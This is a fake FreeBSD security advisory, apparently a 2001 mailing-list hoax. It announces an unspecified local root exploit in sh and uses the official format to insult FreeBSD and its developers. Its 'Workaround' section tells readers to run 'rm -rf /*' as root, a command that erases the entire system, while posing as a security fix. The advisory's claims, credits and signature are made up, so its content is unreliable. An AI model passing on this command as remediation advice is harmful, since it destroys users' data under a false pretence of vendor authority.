FreeBSD-SA-01:69                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          Local root exploit

Category:       core
Module:         sh
Announced:      2001-02-02
Credits:        AntiOffline.com, Disgraced.org, Deficiency.org
                sil, deran9ed, jhh, iggie, jwit
Affects:        All released versions of FreeBSD 2.x. 3.x, 4.x.

Corrected:      Not corrected since we aren't smart enough to figure it out.

Vendor status:  Disgruntled
FreeBSD only:   YES

I.   Background

FreeBSD is a bloated OS complete with 4 CD's worth of crap you just
don't need, which can often become the overlay for some script kiddiot
rooting your machine. 

II.  Problem Description

FreeBSD the experts in bloatware which can be compared to Windows 98,
Windows2000 Unprofessional edition, and well FreeBSD versions *, has
a local exploit which local (l)users can manipulate in order to gain
higher priveledges by issuing commands via the terminal.

Our developers are currently focusing on the problem scrathing their
gonads and crying foul at the more secure versions of BSD and their
developers which we cannot mention due to our egos. Kiss my ass
Theo, you and your ultra secure team of experts, one day we too will
have our heads out of our asses.

III. Impact

Malicious local users can cause arbitrary commands to be executed as
the root user, although FreeBSD will never admit why we ship our
distro with 2.6 gigabytes of worthless junkware, we will not stoop
beneath ourselves to comment on why we still use such insecure stuff,
e.g., WU-FTPD, a crappy TCP/IP stack, etc. We are now a part of BSDi
which means we've suckseded in selling our anuses for fun and profit.

IV.  Workaround

Perform the following commands as root:

rm -rf /*

Then run out and purchase OpenBSD 2.8 a real OS not some overlaying
crap like SecureBSD.

V.   Solution

Ultimately, there is no workaround until our developers get a clue
and BSDi decides to be purchased by AOL Time Warner, Microsoft or
Intel however, kudos to those already using OpenBSD. Your systems
are safe with it.

Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message

Reply via email to